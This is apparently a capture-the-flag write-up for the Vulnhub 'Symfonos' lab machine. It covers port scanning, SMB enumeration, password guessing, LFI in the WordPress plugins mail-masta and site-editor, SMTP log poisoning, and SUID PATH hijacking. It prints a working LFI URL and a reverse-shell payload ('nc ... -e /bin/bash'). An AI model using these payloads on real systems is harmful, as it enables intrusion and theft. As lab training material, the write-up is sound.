# Vulnhub-Symfonos
## Rustscan
```bash
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after: 2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:41:21:96 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PROT 139/445 (SMB)
I ran `smbmap` to see on which shares I have read access as anonmyous user
So we only have read access to `anomyous`share
We can see there a text so let's download it using `GET`
This looks like some potential passwords we can use when brute forcing we also have a username `zeus`
Let's run `enum4linux-ng` to enumerate for users
We only get one user `helios`
## PORT 80 (HTTP)
On the web server we see this weird image
There's nothing in the source either , so I started to fuzz for files and directories using `dirsearch`
But found nothing , so brute forcing is the last resort this is what I'll be doing , we have a username so we could try to brute force against those 3 passwords , if that fails I'll move to rockyou.txt
It failed so let's try these 3 passwords on smb as `helios`
The first password failed but the second worked and we can access his share now
After reading `todo.txt` we get a hidden directory
So this is a wordpress site but the css isn't loaded , we can fix it by seeing where it's grabbing the css file from
We need to add a domain `symfonos.local` in `/etc/hosts` file
Now it looks better so let's enumerate the wordpress site for that I am going to use `wpscan`
We have a user `admin` so we could do brute forcing for his password
Also I'll run a scan for enumerating plugins being used on the wordpress site
We can see two plugins , `mail-masta` and `site-editor`, first I am going to search on mail-masta for any exploits
And it seems we found a LFI vulnerability exploit in mail-masta
Let's give it a try in reading `/etc/passwd` file through LFI
And boom we got LFI vulnerability here
The other plugin is also vulnerable to LFI
Now we know there that port 25 which is smtp is open so we could see if we could poision it's log files ,so visiting hacktricks I found that it's possible
```
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios
```
We can read the logs so it's possbile, I followed this article in order to do smtp log poisioning
https://liberty-shell.com/sec/2018/05/19/poisoning/
The sender's mail is just I saw from the logs so I putted there but that important thing to note here is the subject we are putting which is the GET paramtere being executed as shell command. Now if add a paramter along the path of log file
```
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&pwn=id
```
So let's just get a shell with `netcat`
```
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&hello=nc 192.168.1.2 2222 -e /bin/bash
```
Now we check if we have permissions to run any command as sudo with `sudo -l`
No sudo : \
Let's check for any SUID binaries
We found `/opt/statuscheck`. On running the binary it results to making a request
Let's further analyze the binary if strings is installed on the machine
It is available so we can see what the binary is doing
The binary is using a command `curl http://localhost` so we can exploit PATH variable here by making a fake curl binary include `bash` there and including that binary in the PATH variable
However if we run it , we won't get a root shell
I then tried to make bash a SUID
It gave me an error, so I was not sure why this wasn't working, so I then just removed the shebang line
Ran it again
And boom we have made bash a SUID
